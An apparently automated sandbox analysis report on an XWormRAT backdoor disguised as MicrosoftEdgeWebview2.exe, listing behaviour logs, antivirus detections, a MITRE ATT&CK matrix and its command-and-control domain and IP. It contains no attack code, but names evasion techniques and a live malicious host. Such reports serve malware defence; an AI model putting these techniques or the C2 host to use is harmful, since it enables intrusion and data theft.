            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: MicrosoftEdgeWebview2.exe, 00000000.00000002.2956120617.000000001BBBF000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeWebview2.exe, 00000000.00000002.2916217661.0000000000F34000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeWebview2.exe, 00000000.00000002.2956120617.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: MicrosoftEdgeWebview2.exe, type: SAMPLE
            Source: Yara match | File source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: MicrosoftEdgeWebview2.exe PID: 7632, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara match | File source: MicrosoftEdgeWebview2.exe, type: SAMPLE
            Source: Yara match | File source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: MicrosoftEdgeWebview2.exe PID: 7632, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPED
            MITRE ATT&CK Matrix (the number in parentheses after a technique is the count of matched signatures for that technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (11) | Scheduled Task/Job (1) | Process Injection (11) | Masquerading (1) | Input Capture (1) | Security Software Discovery (221) | Remote Services | Input Capture (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (21) | Scheduled Task/Job (1) | Disable or Modify Tools (11) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Archive Collected Data (11) | Non-Standard Port (1) | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | PowerShell (1) | DLL Side-Loading (1) | Registry Run Keys / Startup Folder (21) | Virtualization/Sandbox Evasion (131) | Security Account Manager | Virtualization/Sandbox Evasion (131) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (11) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (11) | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (1) | Cached Domain Credentials | System Information Discovery (13) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (2) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Behavior Graph (ID: 1501598; Sample: MicrosoftEdgeWebview2.exe; Startdate: 30/08/2024; Architecture: WINDOWS; Score: 100). Recoverable graph content: the sample contacts on-weighted.gl.at.ply.gg (147.185.221.20, ports 15883, 49737, 49738; SALSGIVERUS, United States). Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 16 other signatures. MicrosoftEdgeWebview2.exe drops C:\Users\user\...\MicrosoftEdgeWebview2.exe (PE32), matches Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines), Protects its processes via BreakOnTermination flag, Bypasses PowerShell execution policy and 2 other signatures, and starts three powershell.exe processes plus 2 other processes, each with a conhost.exe child; the powershell.exe processes match Loading BitLocker PowerShell Module. A second MicrosoftEdgeWebview2.exe instance drops C:\Users\...\MicrosoftEdgeWebview2.exe.log (CSV) and matches Antivirus detection for dropped file, Multi AV Scanner detection for dropped file and Machine Learning detection for dropped file.

            Antivirus, Machine Learning and Genetic Malware Detection

            Source | Detection | Scanner | Label
            MicrosoftEdgeWebview2.exe | 69% | Virustotal |
            MicrosoftEdgeWebview2.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            MicrosoftEdgeWebview2.exe | 100% | Avira | TR/Spy.Gen
            MicrosoftEdgeWebview2.exe | 100% | Joe Sandbox ML |

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | 69% | Virustotal |

            No Antivirus matches

            Source | Detection | Scanner | Label
            on-weighted.gl.at.ply.gg | 6% | Virustotal |

            Source | Detection | Scanner | Label
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            http://crl.mic | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            http://www.microsoft. | 0% | URL Reputation | safe
            http://www.microsoft. | 0% | URL Reputation | safe
            http://crl.micft.cMicRosof | 0% | URL Reputation | safe
            https://aka.ms/pscore68 | 0% | URL Reputation | safe
            https://aka.ms/pscore68 | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
            http://crl.microse | 0% | Avira URL Cloud | safe
            on-weighted.gl.at.ply.gg | 100% | Avira URL Cloud | malware
            http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
            https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
            on-weighted.gl.at.ply.gg | 6% | Virustotal |
            https://github.com/Pester/Pester | 1% | Virustotal |
            NameIPActiveMaliciousAntivirus DetectionReputation
            on-weighted.gl.at.ply.gg
            147.185.221.20
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            on-weighted.gl.at.ply.ggtrue
            • 6%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microse | powershell.exe, 00000001.00000002.1756728657.0000019BA0790000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | powershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
